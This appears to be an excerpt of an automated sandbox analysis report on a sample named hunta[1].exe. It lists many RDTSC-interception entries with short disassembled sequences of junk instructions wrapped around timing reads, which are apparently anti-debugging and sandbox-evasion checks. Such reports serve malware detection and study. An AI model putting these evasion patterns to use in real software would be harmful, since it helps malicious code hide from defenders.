Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07A3 second address: 11E07B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FF2E55A2C32h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07B6 second address: 11E07C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FF2E5514DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E07C0 second address: 11E07E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF2E55A2C37h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E863F second address: 11E8653 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF2E5514DEAh 0x00000008 jl 00007FF2E5514DECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D66 second address: 11E6D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C2Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D79 second address: 11E6D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E6D7D second address: 11E6DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C39h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74A3 second address: 11E74A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74A8 second address: 11E74B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74B2 second address: 11E74DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FF2E5514DFFh 0x0000000f jmp 00007FF2E5514DF9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74DA second address: 11E74F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11E74F6 second address: 11E74FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 11F0D9F second address: 11F0DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201D64 second address: 1201D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201D68 second address: 1201D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 120177F second address: 12017A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jp 00007FF2E5514DE8h 0x0000000b pushad 0x0000000c popad 0x0000000d jo 00007FF2E5514DE8h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 je 00007FF2E5514DE6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017A0 second address: 12017B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF2E55A2C26h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007FF2E55A2C26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017B3 second address: 12017C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017C3 second address: 12017C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017C8 second address: 12017CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12017CE second address: 12017E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FF2E55A2C32h 0x0000000b jbe 00007FF2E55A2C26h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 120191E second address: 1201937 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FF2E5514DEFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201937 second address: 1201951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E55A2C36h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1201951 second address: 120196C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121469F second address: 12146A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12146A3 second address: 12146AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12146AD second address: 12146F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FF2E55A2C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jo 00007FF2E55A2C26h 0x00000014 pop ecx 0x00000015 jmp 00007FF2E55A2C37h 0x0000001a pushad 0x0000001b jmp 00007FF2E55A2C38h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218C6A second address: 1218C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF2E5514DF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E2B second address: 1218E2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E2F second address: 1218E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E35 second address: 1218E43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FF2E55A2C2Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E43 second address: 1218E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007FF2E5514DE6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1218E57 second address: 1218E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219121 second address: 1219125 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219125 second address: 121912B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121912B second address: 121912F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121928A second address: 12192A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192A9 second address: 12192D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DEFh 0x00000007 jmp 00007FF2E5514DEFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192D1 second address: 12192D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12192D5 second address: 12192D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219418 second address: 1219441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF2E55A2C31h 0x0000000c jmp 00007FF2E55A2C31h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219441 second address: 121944B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121944B second address: 1219450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219450 second address: 121945A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121945A second address: 1219460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1130EB6 second address: 1130EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF2E5514DE6h 0x0000000a pop edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1219E98 second address: 1219EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Ah 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD49 second address: 121DD5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF2E5514DE6h 0x00000008 jnc 00007FF2E5514DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD5D second address: 121DD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD63 second address: 121DD6D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF2E5514DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 121DD6D second address: 121DD89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C34h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1233580 second address: 123359D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FF2E5514DF5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 123359D second address: 12335CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF2E55A2C26h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FF2E55A2C30h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d jg 00007FF2E55A2C26h 0x00000023 push eax 0x00000024 pop eax 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335CD second address: 12335D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335D3 second address: 12335E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C30h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12335E8 second address: 12335F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 122FDD6 second address: 122FDDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1245C29 second address: 1245C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 1245C2D second address: 1245C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D986 second address: 126D98A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D98A second address: 126D99E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF2E55A2C2Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126C7D4 second address: 126C7E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FF2E5514DE6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CACF second address: 126CB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FF2E55A2C2Bh 0x0000000d pop edi 0x0000000e jmp 00007FF2E55A2C2Eh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FF2E55A2C2Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB06 second address: 126CB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF2E5514DE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FF2E5514DE6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB19 second address: 126CB32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CB32 second address: 126CB38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CCA3 second address: 126CCA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CCA9 second address: 126CCB3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF2E5514DECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CDFD second address: 126CE1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126CE1F second address: 126CE24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D100 second address: 126D10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FF2E55A2C26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D10B second address: 126D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D111 second address: 126D119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D587 second address: 126D58B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D58B second address: 126D591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D591 second address: 126D59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D59A second address: 126D5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 126D6CE second address: 126D6D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12719E9 second address: 12719F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF2E55A2C26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 12719F3 second address: 12719F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 592092B second address: 592092F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 592092F second address: 5920935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F00FD second address: 58F010C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E55A2C2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58F010C second address: 58F0176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF2E5514DF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF2E5514DEEh 0x0000000f push eax 0x00000010 jmp 00007FF2E5514DEBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF2E5514DF6h 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF2E5514DF7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59608B2 second address: 59608B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0BD2 second address: 58E0BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0BD8 second address: 58E0C14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E55A2C2Ch 0x00000009 and ax, 1228h 0x0000000e jmp 00007FF2E55A2C2Bh 0x00000013 popfd 0x00000014 mov si, EB1Fh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF2E55A2C31h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C14 second address: 58E0C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF2E5514DF7h 0x00000009 sbb si, 40CEh 0x0000000e jmp 00007FF2E5514DF9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FF2E5514DF0h 0x0000001a adc ax, 3948h 0x0000001f jmp 00007FF2E5514DEBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007FF2E5514DEFh 0x0000002f mov ah, 3Fh 0x00000031 popad 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FF2E5514DEEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C98 second address: 58E0C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0C9E second address: 58E0CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CA2 second address: 58E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FF2E55A2C39h 0x0000000f push dword ptr [ebp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov ax, di 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CD0 second address: 58E0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 58E0CD5 second address: 58E0CDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309AA second address: 59309AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309AE second address: 59309B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hunta[1].exe RDTSC instruction interceptor: First address: 59309B2 second address: 59309B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
